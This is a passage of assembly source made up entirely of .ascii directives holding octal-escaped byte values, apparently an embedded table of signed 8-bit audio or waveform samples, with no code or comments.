"\343\303\367\355\317\267\251\222\217\262\325\323\331" .ascii "\355\351\372\004\022\022\377\372\013\016\032HN+NB7:" .ascii "\036*\033\363\374\035\014\366\376\003\375\003\014\003" .ascii "\371\334\333\364\360\345\342\326\301\334\302\315\320" .ascii "\245\261\271\301\275\322\312\313\355\362\363\366\370" .ascii "\000\362\342\013\026\007\012\014\363\356\000\010\036" .ascii "\004\000\014\023\013\026\"\014\013\013\000\374\374\362" .ascii "\350\346\331\362\003\346\000\367\367\356\365\006\352" .ascii "\350\316\332\327\327\376\367\351\004\023\026$*4,\037" .ascii "\0375&3M;*!5>.\014\012\035\016\030&\031\032&39>./\013" .ascii "\375\013\011\012\365\356\325\346\354\354\362\312\272" .ascii "\262\243\226\303\337\320\340\356\367\003\011\014\020" .ascii "\372\015\033)$>T-<B:)\032\375\006\376\365\033\021\377" .ascii "\001\012\013\013\007\005\376\344\354\372\356\354\370" .ascii "\340\316\341\324\333\311\260\271\265\261\304\327\312" .ascii "\312\334\335\351\351\347\360\352\350\365\011\363\361" .ascii "\365\354\360\370\021\017\370\005\013\032\027\034\030" .ascii "\006\014\011\010\002\024\372\007\374\362\025\026\012" .ascii "\015\025\004\016\000\375\375\347\313\346\341\326\357" .ascii "\352\346\350\012\024\030\000\001\007\351\000\036\036" .ascii "\013\031\024\020\031\035\035\022\016\007\031\023#0." .ascii "8?FTL8024.F!\025'\015\014\021\003\362\316\262\266\305" .ascii "\276\316\334\325\326\354\362\361\350\341\357\343\354" .ascii "\377\025\015\024\023\026\016\002\376\367\347\331\362" .ascii "\355\353\367\372\360\371\010\020\020\011\022\017\374" .ascii "\005\026 \013\010\003\003\021\022\005\343\326\325\363" .ascii "\351\354\370\356\354\353\363\360\362\350\347\347\336" .ascii "\342\362\332\300\320\305\314\334\324\312\265\277\332" .ascii "\326\334\335\340\323\307\347\343\345\350\355\363\365" .ascii "\374\025!\027\027\036\036\037\036\033\"\013\003\036" .ascii "!\026)\037+.5>+(0514,2 \032\035\031\033\020\011\374" .ascii "\350\356\004\001\375\012\004\012\027\022\036\036\001" .ascii "\002\004\357\001\015\372\356\354\365\375\355\332\306" .ascii "\272\253\276\322\326\342\360\361\376\011\025%\022\034" .ascii "\030%=KH?:M?00\025\031\373\003\007\375\003\005\372\362" .ascii "\003\003\002\372\361\356\361\353\356\363\354\332\327" .ascii "\341\337\324\332\316\272\302\273\327\315\315\323\320" .ascii "\310\322\347\342\345\313\333\343\344\344\363\347\335" .ascii "\342\342\355\352\360\356\357\350\372\000\375\370\373" .ascii "\366\365\003\016\036\001\014\036\024!,5,+/51%" .ascii "\036\023\007\010\017\016\012\017\021\011\017\024\030" .ascii "\020\011\004\013\016\001\027\026\377\015\011\000\376" .ascii "\364\364\366\345\346\001\377\367\014\017\032\"\037)" .ascii "\022\020\024\032\026\027!\024\015\020\007\005\364\343" .ascii "\331\322\324\330\361\346\363\375\017\031\034\034!*\026" .ascii "):=>J:5@3)\037\012\374\366\354\361\363\350\351\351\347" .ascii "\352\357\353\346\344\332\342\336\330\345\336\320\334" .ascii "\330\334\335\322\324\327\312\311\322\307\315\316\331" .ascii "\336\350\350\344\350\342\362\000\363\362\370\362\354" .ascii "\364\372\373\377\362\370\371\361\373\004\363\361\377" .ascii "\361\366\376\002\021\014\003\031/(00%,2$\036\032\003" .ascii "\014\016\004\014\021\012\011\015\014\020\022\022\022" .ascii "\005\003\024\015\015\025\012\006\015\020\012\012\373" .ascii "\375\376\347\362\375\375\000\003\022\031\035\026\022" .ascii "\032\010\020\032\022\017\023\014\001\004\370\356\341" .ascii "\322\321\322\316\334\353\354\361\375\003\002\020\030" .ascii "\031%\0378B6FJFC4%\"\021\011\007\004\375\371\376\364" .ascii "\363\370\362\365\364\361\355\346\343\356\354\345\356" .ascii "\355\344\344\347\346\340\321\323\327\311\277\315\315" .ascii "\304\313\325\330\325\327\344\340\335\344\346\345\326" .ascii "\354\337\335\353\344\350\344\333\340\352\335\337\345" .ascii "\341\336\346\353\357\370\374\010\015\015\034(#*;-09" .ascii "'\"\035\"\036\034\033\"\037\024 ',')-(\033\030&-+**" .ascii "$\037\"\035\030\017\005\012\002\376\011\013\006\017" .ascii "\021\017\017\011\013\007\002\003\004\376\000\001\362" .ascii "\357\345\323\321\311\275\300\277\274\307\332\317\325" .ascii "\346\350\367\376\000\002\020\022#2/161+(\036\030\017" .ascii "\003\010\004\371\375\001\376\373\006\006\012\002\375" .ascii "\375\002\374\013\014\377\012\007\010\013\020\005\004" .ascii "\353\353\357\343\341\347\351\344\354\354\363\362\350" .ascii "\356\364\352\357\361\352\345\351\353\351\353\346\344" .ascii "\335\322\316\320\306\304\316\307\306\311\324\326\343" .ascii "\342\361\372\365\376\005\017\016\035\017\015\017\015" .ascii "\005\015\003\002\013\371\004\013\010\011\023\017\024" .ascii "\027\025\034\035\030(*&.0.-+&%\031\025\036\035\027\"" .ascii "*&,)%+\036%# \035\"\"\026\031\015\014\373\353\343\342" .ascii "\321\322\343\325\334\340\346\351\370\367\003\016\010" .ascii "\030\033\036$.)$* \030\017\006\002\370\354\354\354\335" .ascii "\340\346\341\344\347\337\342\333\331\344\337\342\353" .ascii "\355\345\362\357\355\372\352\345\347\334\316\324\327" .ascii "\316\343\330\333\340\342\354\357\356\347\367\356\353" .ascii "\362\365\363\373\375\372\372\363\362\357\344\343\347" .ascii "\340\334\346\347\353\364\374\004\007\013\017\036\025" .ascii "\"/(-)+*%$$$\034\037\033\016\031#\025\027\037\036!\027" .ascii "\031\033\036\033%& \"#\030\030\014\014\003\376\006" .ascii "\004\003\011\015\011\013\012\013\012\001\000\005\374" .ascii "\365\000\371\363\364\353\341\334\316\305\305\272\270" .ascii "\305\311\304\324\340\336\362\370\366\007\004\022\033" .ascii "\017\032(%#\037\" \025\016\007\002\365\370\374\361\364" .ascii "\375\372\374\371\370\373\371\365\000\002\376\006\016" .ascii "\011\013\016\011\010\002\005\363\011\361\000\376\305" .ascii "\355\330\353\002\357\003\374\360\363\353\375\364\350" .ascii "\012\004\037\016\371\352\351\372\320\323\273\262\325" .ascii "\316\322\370\337\363\011\010\016\374\036(\036\014\010" .ascii "\021,\026\002\017\362\361\000\377\342\352\"\030!(3(" .ascii "\016\020\366\005\365\377\364\337\372\005\015$\010 9" .ascii "\021\032\027\025\017\025\361\357\376\031\014\374\364" .ascii "\357\023\362\373\002\033&\035-\031\022\015\374\343\310" .ascii "\316\332\316\274\273\315\341\350\366\376\0342 )\037" .ascii ".W5 /).\035\007\015\027\023\006\007\001\020\"\034\003" .ascii "\002\023\036\013\362\377\364\367\003\350\343\367\000" .ascii "\373\372\021\020\033\013\361\374\371\004\354\342\340" .ascii "\333\355\354\317\340\342\342\340\324\366\367\003\011" .ascii "\377\367\007\011\364\336\325\323\321\270\231\263\277" .ascii "\307\323\327\361\376\014\020\002\000\025!\006\000\011" .ascii "\010\016\377\354\011\005\000\374\364\375\022\035\017" .ascii "\022\021\"\036\027\004\014\030\374\372\370\005\027\036" .ascii "\036\024\"64\031\016\"\023\014\017\004\003\015\015\376" .ascii "\371\003\011\011\006\370\025&\027\033\025\024\034\006" .ascii "\360\340\322\324\315\271\264\321\350\355\363\374\020" .ascii "\"&/.0:?'%31#\023\014\016\022\000\000\373\003\021\017" .ascii "\005\005\017\031\014\371\376\370\362\355\342\350\361" .ascii "\377\000\365\377\002\017\011\366\363\375\372\345\341" .ascii "\335\344\346\334\320\315\331\345\346\330\340\373\001" .ascii "\374\370\377\002\006\360\333\327\306\312\267\242\255" .ascii "\302\315\322\327\341\375\006\001\007\022\021\034\024" .ascii "\377\006\021\026\005\372\001\006\005\376\000\004\010" .ascii "\030\022\011\031$(\033\003\012\021\003\376\371\007\013" .ascii "\024\032\021\037(*&\025\026#\031\013\004\007\017\013" .ascii "\000\371\374\004\013\005\374\013!\034\021\016\024\027" .ascii "\013\361\334\324\316\314\277\270\315\341\350\360\365" .ascii "\014%%&*28;,!*0'\026\004\012\026\002\367\373\002\021" .ascii "\021\017\007\023\036\026\006\360\373\371\354\345\350" .ascii "\363\372\000\373\372\004\015\007\376\363\371\376\357" .ascii "\342\342\346\347\346\322\325\341\344\351\340\342\366" .ascii "\011\002\376\002\006\007\360\333\320\310\301\272\257" .ascii "\255\303\323\323\326\344\374\014\011\005\015\022\032" .ascii "\024\012\014\023\030\013\370\371\004\006\372\363\376" .ascii "\010\025\026\016\027 \032\006\001\011\011\370\361\375" .ascii "\007\017\014\015\023\"$\035\020\013\033\032\005\000" .ascii "\005\007\012\367\360\370\370\000\000\370\002\030\034" .ascii "\017\013\015\015\003\350\324\320\315\304\300\270\302" .ascii "\334\345\350\362\007\037' #156.#(/$\021\005\006\016" .ascii "\007\370\371\007\015\023\020\017\027\036\027\007\370" .ascii "\371\002\371\350\350\366\376\002\375\374\012\021\015" .ascii "\006\372\375\007\375\353\353\365\364\355\335\335\351" .ascii "\357\356\355\354\373\021\014\005\007\013\016\370\340" .ascii "\326\322\314\300\273\265\304\334\332\337\352\376\024" .ascii "\017\010\017\035!\036\026\023\031\035\020\001\373\001" .ascii "\012\375\364\377\016\024\026\024\027$%\030\013\002\006" .ascii "\014\375\360\372\007\013\012\005\016\033\034\024\014" .ascii "\007\022\027\007\375\000\004\000\364\346\354\366\365" .ascii "\364\365\367\011\025\012\001\002\003\373\340\312\310" .ascii "\307\275\265\264\273\317\334\341\345\373\022\032\027" .ascii "\022$.-%\036!%\033\007\377\372\000\002\365\354\375\014" .ascii "\013\011\012\022\032\022\002\372\364\371\370\350\343" .ascii "\360\373\375\370\370\006\020\010\001\374\373\005\005" .ascii "\363\354\365\370\360\343\335\353\363\356\355\363\375" .ascii "\016\023\012\011\015\014\377\347\327\331\326\307\302" .ascii "\304\316\337\346\351\363\004\023\030\021\024%-&\"\"" .ascii "$'\032\017\014\014\020\015\001\005\027\037\036 \")-" .ascii "!\031\023\017\017\017\001\000\020\024\021\021\024\037" .ascii "#\025\025\023\023\031\023\006\003\012\010\376\364\363" .ascii "\375\002\367\371\002\007\020\016\005\002\377\370\346" .ascii "\321\307\312\304\271\273\305\320\334\345\352\372\006" .ascii "\017\024\020\026&(\037\037\037\036\031\014\002\000\374" .ascii "\371\366\355\361\001\004\001\004\011\014\010\372\364" .ascii "\364\357\355\351\343\346\362\365\362\363\367\376\373" .ascii "\361\361\365\362\363\360\351\351\354\351\343\337\341" .ascii "\352\352\344\351\365\371\376\377\373\374\370\355\341" .ascii "\321\312\315\310\276\301\314\322\336\344\353\370\000" .ascii "\006\010\013\022\035\037\033\036! \032\023\015\020\014" .ascii "\007\006\002\011\027\033\031\036$%\036\022\020\023\015" .ascii "\010\011\007\014\024\025\024\030\033\035\032\021\022" .ascii "\030\023\020\020\014\014\014\007\004\002\002\007\005" .ascii "\376\005\016\016\014\014\006\002\371\354\341\330\320" .ascii "\322\316\310\321\336\345\356\367\001\015\022\025\035" .ascii " $.-(*+%\037\024\021\020\006\377\000\001\004\015\016" .ascii "\016\022\022\021\011\377\375\377\371\361\365\366\372" .ascii "\377\001\001\004\005\002\376\366\367\376\370\364\366" .ascii "\363\362\364\361\360\357\356\362\360\356\363\376\375" .ascii "\372\377\372\365\356\342\335\325\313\314\310\306\315" .ascii "\330\337\345\355\364\375\377\001\012\020\023\030\034" .ascii "\030\034\036\033\026\020\014\014\004\375\003\007\012" .ascii "\021\024\024\027\030\025\021\012\007\010\002\374\001" .ascii "\006\010\015\017\020\022\020\016\014\006\005\012\004" .ascii "\377\002\002\001\377\375\374\375\371\370\372\367\372" .ascii "\000\376\370\367\363\355\343\330\323\316\307\304\311" .ascii "\310\320\336\344\354\365\374\004\011\013\025\033\033" .ascii "\036\"\037\036 \031\025\017\007\005\376\367\375\001" .ascii "\000\004\006\010" .ascii "\010\007\003\001\373\364\366\363\355\363\371\374\377" .ascii "\000\001\002\377\373\374\367\364\366\363\357\362\366" .ascii "\364\365\362\363\364\361\361\365\365\365\373\374\371" .ascii "\367\366\361\352\340\333\331\320\314\320\324\330\343" .ascii "\352\356\366\375\004\012\012\021\032\031\033!\"## \035" .ascii "\030\022\021\017\012\016\025\024\026\032\034\035\034" .ascii "\027\026\022\012\013\013\010\014\024\025\027\031\032" .ascii "\033\030\023\022\020\011\012\012\006\010\014\013\011" .ascii "\010\006\007\003\376\001\003\377\377\000\372\371\365" .ascii "\356\351\336\330\327\322\316\325\335\340\351\362\371" .ascii "\002\011\017\026\030\033\"#!%($\"\035\030\024\014\010" .ascii "\011\005\003\007\007\007\012\013\013\010\003\376\374" .ascii "\366\364\370\367\372\000\002\002\004\004\005\001\374" .ascii "\371\371\364\360\364\364\363\370\370\366\365\362\365" .ascii "\363\356\361\364\362\360\364\364\362\356\351\343\334" .ascii "\324\322\320\314\320\331\334\340\352\360\367\376\002" .ascii "\010\014\014\021\027\026\031\037\035\033\030\025\023" .ascii "\017\011\013\013\010\013\017\016\021\024\021\020\012" .ascii "\006\007\003\377\004\010\007\014\020\017\022\021\020" .ascii "\016\010\004\005\001\375\001\003\001\002\003\000\000" .ascii "\375\373\373\366\363\366\364\360\362\361\355\350\341" .ascii "\334\327\320\315\320\317\321\334\341\347\360\372\001" .ascii "\010\013\017\025\024\027\035\035\035 \036\031\026\021" .ascii "\016\012\003\003\004\377\000\004\004\004\004\002\377" .ascii "\373\366\366\366\362\365\373\373\375\002\003\004\002" .ascii "\377\375\370\363\363\364\361\363\370\366\367\367\366" .ascii "\367\363\361\363\361\355\361\362\361\362\362\355\351" .ascii "\344\337\340\334\332\340\343\342\355\360\360\367\001" .ascii "\351\366\377\344\020.%\023- \0150\015,\024\355\020\003" .ascii "\315\343\350\300\364\352\362\346\360\342\352\340\327" .ascii "\351\366\007\007/\023%\0171\370\336\374\305\374\360" .ascii "\333\343\330\273\341\353\361\016\355\376\356\361\375" .ascii "\020\344\364\366\265\326\324\326\324\347\336\014\012" .ascii "5L>J(D\033+\376\377\352\313\371\002\373\014\013\313" .ascii "\015\352\002=\013\026\031\375\357\003\330\365\356\345" .ascii "\014\367\366\007\013\347&\037'2.B06*:\005(!\023'\036" .ascii "\016\005\027\347\033\006\"Q6K8\015\005\022\335\011\373" .ascii "\334\373\000\360\367\011\342\037\343\341\001\362\017" .ascii "\033\027\371\035\365\001\370\356\376\003\367\372\026" .ascii "\36655>G(!\027\363\345\374\321\367\361\360\372\351\342" .ascii "\337\351\312\373\355\012'\026%\"\004\375\023\335\357" .ascii "\354\347\344\335\317\324\337\310\372\355\001\013\360" .ascii "\345\353\333\333\353\312\360\331\314\331\310\304\325" .ascii "\325\331\035\032;M@60\026\371\003\325\363\344\342\375" .ascii "\373\360\372\375\337\023\003\035)\022\003\004\355\335" .ascii "\365\326\375\356\371\003\365\357\000\006\0043\"=<:<" .ascii ";\035\033,\005,\033\031\033\007\373\005\376\365)\036" .ascii "?L=.\"\000\375\005\333\005\361\353\361\355\343\363\365" .ascii "\346\373\316\357\362\373\002\007\372\372\004\342\015" .ascii "\372\367\377\373\352\003\030%N5A2\033\010\003\337\337" .ascii "\354\322\363\342\343\341\335\314\340\341\342\011\375" .ascii "\"\027\025\013\012\370\364\366\334\362\334\343\334\326" .ascii "\313\333\324\342\013\361\001\355\344\335\337\320\334" .ascii "\336\304\335\311\310\311\312\301\341\342\3762#?9+\032" .ascii "\030\365\361\354\326\356\344\356\361\372\350\374\371" .ascii "\005)\026'\033\011\370\001\347\356\367\355\003\364\377" .ascii "\375\374\361\017\017\032<0KA=42\031\"#\024%\021\024" .ascii "\014\013\375\022\014\032=8K;/\031\025\370\004\375\356" .ascii "\005\357\364\360\363\347\373\346\337\354\336\371\376" .ascii "\000\374\004\356\001\375\363\015\375\377\002\013\004" .ascii ")0:I44\"\020\367\371\336\350\345\335\353\333\336\332" .ascii "\337\323\357\355\374\023\021\037\024\017\002\004\350" .ascii "\367\356\344\360\340\341\330\332\322\353\344\364\376" .ascii "\357\365\350\342\331\342\312\335\325\310\326\310\311" .ascii "\311\322\323\370\373\0320'3*\031\005\005\343\356\346" .ascii "\343\366\356\362\365\373\362\016\013\037)\036 \025\006" .ascii "\370\002\351\373\372\372\005\376\377\001\006\000!\036" .ascii "3ABIB:-1\025$\034\027\033\020\017\012\014\007#\0369" .ascii "E@>-\037\015\013\364\005\367\366\376\364\361\361\360" .ascii "\343\361\330\346\357\356\375\000\374\367\001\360\005" .ascii "\374\377\012\002\003\016\030\033>6B=,#\023\376\357\362" .ascii "\332\350\336\336\340\332\327\334\340\334\374\370\015" .ascii "\026\026\026\016\002\371\372\345\364\350\346\344\336" .ascii "\331\331\334\333\363\351\370\364\356\351\344\335\327" .ascii "\331\312\331\311\312\313\310\306\317\331\344\004\006" .ascii "#% \036\024\377\365\362\335\356\342\352\362\357\357" .ascii "\372\376\001\034\025'\"\032\025\014\373\371\376\354" .ascii "\377\370\374\376\376\374\006\013\017-*?DD@;+&%\022 " .ascii "\022\021\015\013\006\013\021\0300-@=5)\037\015\004\000" .ascii "\362\376\357\363\361\356\347\352\343\336\344\331\356" .ascii "\357\364\371\375\363\371\374\364\003\370\000\001\003" .ascii "\010\033\"-@3:,\036\021\006\355\354\346\325\341\325" .ascii "\330\327\330\325\343\343\355\006\001\022\022\021\010" .ascii "\007\366\365\361\340\353\336\335\331\334\325\337\340" .ascii "\346\363\351\363\355\353\342\343\326\326\321\307\320" .ascii "\302\310\310\313\312\333\343\363\007\010\033\025\022" .ascii "\011\001\354\353\344\333\350\340\353\357\364\365\007" .ascii "\006\021\037\030$\033\026\017\011\366\375\370\357\377" .ascii "\371\377\001\004\002\022\021\03720@?=42\036!\027\012" .ascii "\024\011\012\012\017\011\031\032'41=5-\036\031\002\001" .ascii "\370\361\371\360\364\360\357\342\346\332\333\337\337" .ascii "\361\360\366\367\372\356\367\363\361\374\370\005\011" .ascii "\022\027,(39/3$\031\012\000\347\353\336\330\342\333" .ascii "\341\341\344\342\362\353\372\007\003\017\015\011\001" .ascii "\377\353\360\343\334\344\334\336\337\343\333\352\343" .ascii "\354\362\355\367\364\357\346\345\323\326\314\314\322" .ascii "\314\321\324\331\327\353\353\373\004\007\021\011\004" .ascii "\372\364\340\345\333\337\350\351\366\373\001\002\024" .ascii "\016\034\" '\036\030\017\010\367\002\370\373\006\005" .ascii "\012\015\020\017 \031+45>=7.)\024\032\013\012\021\015" .ascii "\016\023\027\023%!276:2&\030\021\374\000\365\367\373" .ascii "\367\366\363\356\337\344\327\340\342\351\365\366\367" .ascii "\366\366\352\365\356\367\000\004\020\031\036#4+851/" .ascii " \022\005\370\343\354\337\342\351\350\353\357\356\355" .ascii "\373\362\003\007\010\016\014\003\374\366\343\353\335" .ascii "\337\345\344\343\347\346\342\357\346\366\367\371\374" .ascii "\372\356\345\341\321\327\315\324\327\330\332\340\341" .ascii "\342\362\356\377\377\004\006\001\365\356\347\331\342" .ascii "\334\351\360\367\377\007\007\013\032\024%%'&\037\022" .ascii "\015\004\370\005\374\006\014\017\021\027\023\027%\035" .ascii "03787*#\033\013\023\007\015\021\023\021\030\027\032" .ascii ")%7661*\030\015\004\366\374\362\372\372\370\362\361" .ascii "\344\333\337\327\345\345\357\363\365\356\357\354\346" .ascii "\363\360\000\007\017\026!\037&1+7/-$\027\003\374\356" .ascii "\341\352\341\352\356\360\357\365\355\362\373\364\005" .ascii "\005\011\007\005\366\362\350\334\345\334\342\345\347" .ascii "\341\347\342\346\356\353\373\372\375\367\365\345\337" .ascii "\327\317\325\317\331\333\337\335\345\341\346\356\354" .ascii "\374\370\374\370\363\342\341\331\326\342\340\362\367" .ascii "\375\000\013\005\017\032\030'#%\037\027\006\007\375" .ascii "\370\004\000\013\017\022\021\030\020\030\"\037/12-*" .ascii "\030\026\013\004\014\006\015\017\023\017\027\024\036" .ascii "''30-\"\033\007\002\366\363\367\361\371\366\363\350" .ascii "\347\330\332\331\331\350\347\355\355\356\342\350\342" .ascii "\347\364\366\007\016\023\026#\034',*1)\"\027\013\364" .ascii "\365\346\342\353\350\360\362\363\357\366\352\363\372" .ascii "\371\005\005\005\376\372\350\352\335\334\343\340\345" .ascii "\345\346\340\347\340\354\360\363\376\374\372\361\353" .ascii "\333\333\317\321\330\326\337\341\343\337\345\336\352" .ascii "\352\355\371\364\361\354\345\326\334\324\334\350\353" .ascii "\370\377\001\002\016\010\027\034\037)$\037\031\021\376" .ascii "\005\374\377\007\012\021\023\023\020\031\017\034!&." .ascii ".+#\034\013\017\004\006\014\015\021\021\023\021\031" .ascii "\025%'*0*#\027\015\374\376\360\365\371\366\371\365\355" .ascii "\343\341\323\337\335\341\355\355\352\351\347\335\351" .ascii "\344\362\376\003\016\027\030\032&\037-,/.(\030\017\002" .ascii "\361\362\352\356\363\364\370\371\364\361\367\357\371" .ascii "\372\375" .ascii "\003\374\373\357\355\332\350\326\347\331\337\311\367" .ascii "\364\305\351\3512\"Eh5\343\032\341\357\316\330\332\343" .ascii "5\315\355\274%\353\030\036\003\032\322\023\302\001\037" .ascii "\330\277\322\356\377\307\252\346\335\004:9A@<\025\026" .ascii "\022\357\337\315\327\303\276\301\277\272\324\321\272" .ascii "\313\350\013\006\015\377\334\326\270\275\276\273\332" .ascii "\303\275\273\266\312\276\260\326\327\361\014\371\022" .ascii "\033\025\026&\034\037$\011\010\013\024+\034\0371\033" .ascii "\036+/'5;\032\033!\022\021\007\375\0374F81I?YG5GD1\017" .ascii "\360\354\372\354\345\340\373\375\002\011\006\037%)\027" .ascii "\006\011\024\373\354\334\316\335\332\323\305\342\342" .ascii "\354\353\336\370\004\024\376\004\030\020\362\362\352" .ascii "\001\033\003\017\013\015\021\017\005\006\030\036\034" .ascii "\013\014\035\033\021\007\364\376\033\006\370\366\362" .ascii "\352\373\011\026?EMLCBI \016\000\372\023\363\372\002" .ascii "\012 \026\0248SWXE6<3\006\363\341\323\326\300\306\314" .ascii "\320\332\326\300\320\357\347\345\345\341\340\331\267" .ascii "\260\255\253\267\253\255\262\305\313\302\277\320\345" .ascii "\357\370\346\357\365\346\322\316\306\307\333\321\335" .ascii "\363\011\001\371\364\011!(6185-\002\363\352\336\357" .ascii "\336\341\372\007\015\017\0307WdfXXW@%\014\006\003\367" .ascii "\336\334\346\345\346\356\354\376\035\034 \024\025\024" .ascii "\004\360\353\356\351\361\332\331\352\355\355\352\345" .ascii "\365\012\003\010\377\011\005\364\341\323\333\337\337" .ascii "\330\336\346\361\360\357\364\014\"\036\"$)!\020\372" .ascii "\364\372\374\001\362\372\017\021\021\024\0302LOaba^" .ascii "F+!!\033\021\003\004\013\020\005\006\025#66632#\374" .ascii "\332\322\335\341\351\352\364\002\014\003\377\012\027" .ascii "'\036\034\034\037\031\002\361\360\373\000\006\005\013" .ascii "\015\017\375\367\377\007\022\004\373\375\375\354\330" .ascii "\304\273\302\276\271\260\270\304\306\275\277\321\334" .ascii "\356\353\356\362\364\355\327\311\307\321\312\307\302" .ascii "\316\331\332\325\332\357\374\016\007\007\022\025\013" .ascii "\374\355\352\365\351\346\352\370\004\013\005\006\031" .ascii "\035$\026\021\030\030\012\370\362\364\005\003\010\021" .ascii "$-/%\"59:,##\033\001\353\337\337\354\344\345\350\362" .ascii "\377\375\365\372\023\037'\"#(\"\017\373\360\353\362" .ascii "\343\334\336\351\361\355\350\356\005\013\020\014\014" .ascii "\025\020\376\353\342\341\354\340\334\345\357\371\364" .ascii "\357\367\015\022\032\027\027\"\036\011\370\365\364\375" .ascii "\363\365\006\031')',@A@958.\021\375\372\365\373\356" .ascii "\355\370\005\013\004\375\374\007\003\003\003\020 \035" .ascii "\017\004\005\006\015\000\377\011\025\034\025\026#;<" .ascii "CGOZR;&!\025\025\001\370\001\004\002\367\361\370\012" .ascii "\004\003\377\000\003\365\335\313\313\307\306\270\270" .ascii "\306\315\314\310\311\323\352\350\351\351\355\360\340" .ascii "\310\272\275\267\270\255\257\274\305\306\302\307\325" .ascii "\353\351\351\354\363\367\352\330\314\323\317\314\302" .ascii "\302\313\320\315\307\315\337\367\367\377\011\026\037" .ascii "\026\007\000\005\001\000\362\364\001\003\373\364\366" .ascii "\003\026\021\030!+1%\022\013\023\020\021\013\023%,'" .ascii "%/;MHHLPL9\"\032\037\026\023\012\021\035!\032\027 -" .ascii "=68=C<&\022\011\013\001\375\363\371\005\010\377\374" .ascii "\010\025$\033\035#(#\023\006\004\012\001\375\361\366" .ascii "\376\370\353\345\353\363\374\361\364\371\372\362\337" .ascii "\315\310\310\271\260\243\246\257\260\257\272\316\340" .ascii "\364\364\375\007\014\004\365\346\347\357\347\351\353" .ascii "\372\011\017\017\032)3?79;7'\023\002\376\376\362\357" .ascii "\352\362\370\367\360\365\002\015\027\021\030\035\033" .ascii "\016\377\363\363\364\354\357\355\370\000\377\371\376" .ascii "\011\022\031\023\033\035\031\015\376\362\362\364\352" .ascii "\354\351\362\366\362\356\371\003\014\027\021\031\027" .ascii "\020\375\354\334\330\326\313\316\320\334\343\345\345" .ascii "\362\377\010\023\015\023\022\012\367\347\331\327\322" .ascii "\306\310\310\320\324\327\327\345\362\375\005\004\016" .ascii "\017\014\376\366\356\360\357\352\357\357\371\372\367" .ascii "\364\377\006\016\022\021\032\027\022\004\373\361\366" .ascii "\363\356\363\363\374\377\376\376\015\023\035\" '$\032" .ascii "\016\006\373\000\375\372\001\004\014\017\020\022$,9" .ascii "ABHD9(\036\022\023\012\003\004\003\004\003\002\000\015" .ascii "\021\031\031\024\023\011\371\346\337\330\337\337\346" .ascii "\360\367\002\006\010\013\033!-03:61)'%.*,.,-(! *'-*" .ascii "&$\032\013\374\362\350\355\343\342\346\347\351\347\345" .ascii "\347\362\362\373\373\373\372\365\351\340\333\326\333" .ascii "\322\323\324\324\323\322\320\324\337\342\354\352\354" .ascii "\354\346\331\320\313\307\313\306\314\316\321\322\322" .ascii "\317\323\332\333\341\334\336\335\326\314\312\307\311" .ascii "\321\315\325\327\332\333\334\332\342\352\353\363\357" .ascii "\361\355\346\334\332\325\330\342\340\351\356\365\370" .ascii "\375\376\013\024\031$$'%!\026\025\021\023\026\020\024" .ascii "\024\025\024\026\026 ',4251+!\037\033\036\036\034! " .ascii "! ! *.49683-%% &''--/01.:9<<62(\033\017\013\000\003" .ascii "\377\374\375\372\366\361\354\347\356\353\357\362\362" .ascii "\363\363\360\355\361\360\372\371\373\376\000\000\001" .ascii "\006\013\031\036*/11-$\034\027\017\020\007\005\002\375" .ascii "\370\365\362\362\370\366\374\370\364\360\352\340\334" .ascii "\332\325\332\323\324\323\320\317\321\321\326\341\343" .ascii "\353\352\351\346\337\324\321\315\311\316\312\315\315" .ascii "\316\314\320\317\326\337\340\347\346\347\343\341\332" .ascii "\332\330\327\332\324\324\320\317\313\315\314\326\336" .ascii "\342\354\354\357\355\353\344\344\340\342\345\340\343" .ascii "\341\340\336\341\341\354\363\370\003\002\005\006\006" .ascii "\001\006\004\011\016\014\021\022\022\023\032\032&-2" .ascii "8640* !\034\036\037\035\037\035\035\035\"!,158650+%" .ascii "&!#\"\037\037\035\034\033\036\036+-498850+-'+($#\037" .ascii "\032\027\026\023\034\031\033\032\024\016\011\000\367" .ascii "\365\352\352\343\334\331\327\324\326\335\341\360\366" .ascii "\000\005\006\005\005\000\374\000\376\005\006\012\015" .ascii "\020\022\026\034\036('*'!\033\023\012\003\001\371\371" .ascii "\363\360\354\350\343\343\342\345\357\355\363\362\357" .ascii "\352\345\334\331\330\323\331\326\326\326\326\324\330" .ascii "\331\334\345\343\350\347\344\337\335\326\324\325\321" .ascii "\326\323\323\322\323\321\326\331\336\351\352\360\357" .ascii "\353\344\340\326\323\321\316\321\316\320\320\322\322" .ascii "\330\333\340\351\352\357\355\353\347\345\336\335\335" .ascii "\333\341\337\342\343\345\346\360\363\374\011\015\025" .ascii "\026\027\024\023\014\020\020\020\025\025\026\030\031" .ascii "\027\035\036!*(,)'!\037\030\027\034\021\024\012\033" .ascii "\026#\025\031/\030+ \030,66\034\004)\026\013\007\004" .ascii "\013\343\020\031\017\026\036,\015+1*='\016(\024\022" .ascii "2\004\000\025\020\033\033\022\034\006\002\011\027\012" .ascii "\365\003\370\343\305\320\353\316\342\361\372\005\000" .ascii "\003\377\006\004\011\001\022\037&\016\025\027\0230#" .ascii "\0345%1G\0355#%-\027\"\034\031\016\366\354\344\347\357" .ascii "\361\356\344\360\363\336\344\354\330\330\343\360\355" .ascii "\370\352\350\354\342\366\357\366\374\356\002\376\364" .ascii "\011\374\363\377\363\370\373\344\356\342\335\324\331" .ascii "\345\340\332\332\334\324\326\325\313\313\321\314\344" .ascii "\332\332\326\307\320\306\316\333\333\347\347\353\356" .ascii "\350\367\344\356\372\355\367\375\355\347\337\324\336" .ascii "\336\345\352\357\356\353\364\365\366\001\003\001\012" .ascii "\021\027\014\006\015\374\001\017\030\032\035\036\033" .ascii "\035\027\032$\037#!\033 \026\025\011\375\004\367\371" .ascii "\007\377\004\000\375\372\371\000\375\003\005\010\006" .ascii "\011\007\010\007\017\022\033('+\"+\035!#\035#\034\034" .ascii "\022\010\002\367\351\357\342\340\350\335\341\333\321" .ascii "\317\317\321\326\336\340\350\355\356\357\367\365\377" .ascii "\005\015\030\027()(,4:?BG?87&\037\031\030\017\022\024" .ascii "\016\021\006\001\001\370\375\005\376\006\004\376\002" .ascii "\372\375\370\370\375\373\004\013\015\016\023\026\015" .ascii "\022\026\023\024\020\012\001\367\362\353\352\354\354" .ascii "\360\356\361\353\350\352\347\355\363\364\376\003\372" .ascii "\002\367\365\367\365\372" .ascii "\373\001\003\006\001\004\000\376\000\377\001\003\001" .ascii "\366\364\353\343\340\335\341\340\343\342\341\342\343" .ascii "\344\343\351\362\367\001\004\001\012\002\002\013\013" .ascii "\022\034!'-*.,*+-1.*\"\034\016\006\005\377\377\001\002" .ascii 